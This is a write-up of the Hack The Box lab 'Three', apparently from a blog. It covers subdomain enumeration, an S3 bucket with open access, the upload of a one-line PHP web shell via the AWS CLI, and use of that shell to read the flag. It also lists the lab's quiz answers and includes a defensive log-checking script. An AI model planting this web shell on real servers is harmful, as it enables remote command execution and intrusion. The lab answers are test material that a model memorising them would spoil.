HackBox---Three

# Three

# 1. Questions
How many TCP ports are open?
2
What is the domain of the email address provided in the "Contact" section of the website?
thetoppers.htb
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts
Which sub-domain is discovered during further enumeration?
s3.thetoppers.htb
Which service is running on the discovered sub-domain?
Amazon S3
Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli
Which command is used to set up the AWS CLI installation?
aws configure
What is the command used by the above utility to list all of the S3 buckets?
aws s3 ls
This server is configured to run files written in what web scripting language?
PHP
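# 2. Getting the Flag

First, run a port scan against the target IP to see which ports are open.

In Firefox, browse to the IP address; the page contains a domain name, thetoppers.htb.

Use OneForAll to brute-force subdomains, which turns up one subdomain, s3.thetoppers.htb.

In the absence of a DNS server, we can use the hosts file to resolve hostnames to IP addresses so that we can access the websites that point to those hostnames.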

```bash
# Map both hostnames to the target IP (appending to /etc/hosts requires root)
echo '10.129.192.178 thetoppers.htb' >> /etc/hosts
echo '10.129.192.178 s3.thetoppers.htb' >> /etc/hosts
```

  • Visit s3.thetoppers.htb in the browser

  • From the subdomain brute-force, we learn that this domain uses an Amazon server; download and install aws
  • Configure it with aws configure

List all of the S3 buckets

```bash
aws --endpoint=http://s3.thetoppers.htb s3 ls
```

List the directories and objects in that bucket

```bash
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
```

Write a one-line web shell, copy it into the S3 bucket with the cp command, and check the result

```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
```

  • Using cmd=cat+../flag.txt retrieves the flag directly

  • http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
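
A defender-side check for the upload-then-execute sequence above, as an added example that is not part of the original post: it flags script files in a bucket listing that are missing from the deployed baseline, then finds the web requests that reached them. The listing, access-log lines, baseline and client addresses are constructed sample data, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Extensions the server executes; .php is from this page, the rest are assumed.
EXEC_EXT = (".php", ".phtml", ".phar")

# Constructed sample: `aws s3 ls --recursive` output (date, time, size, key).
LISTING = """\
2023-02-11 21:40:02      11952 index.php
2023-02-11 21:40:03      90172 images/band.jpg
2023-02-11 22:11:52         31 shell.php
"""

# Constructed sample: Apache combined-format access log lines.
ACCESS_LOG = """\
10.10.14.7 - - [11/Feb/2023:22:10:01 +0000] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"
10.10.14.7 - - [11/Feb/2023:22:12:30 +0000] "GET /shell.php?cmd=cat+../flag.txt HTTP/1.1" 200 33 "-" "Mozilla/5.0"
10.10.14.9 - - [11/Feb/2023:22:13:00 +0000] "GET /images/band.jpg HTTP/1.1" 200 90172 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

def unexpected_scripts(listing, baseline):
    """Return executable-script keys in the bucket that are not in the baseline."""
    found = []
    for line in listing.splitlines():
        parts = line.split(None, 3)  # date, time, size, key (key may contain spaces)
        if len(parts) == 4 and parts[3].lower().endswith(EXEC_EXT):
            if parts[3] not in baseline:
                found.append(parts[3])
    return found

def hits_on(scripts, access_log):
    """Return (client, path, decoded query params) for requests to those scripts."""
    wanted = {"/" + s for s in scripts}
    hits = []
    for line in access_log.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        if url.path in wanted:
            hits.append((m.group(1), url.path, dict(parse_qsl(url.query))))
    return hits

if __name__ == "__main__":
    rogue = unexpected_scripts(LISTING, baseline={"index.php"})
    for client, path, params in hits_on(rogue, ACCESS_LOG):
        print(f"ALERT {client} executed {path} with {params}")
```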
    


Author: ReadPond
Published: November 21, 2022
https://rofgd.github.io/2022/11/21/HackBox-Three/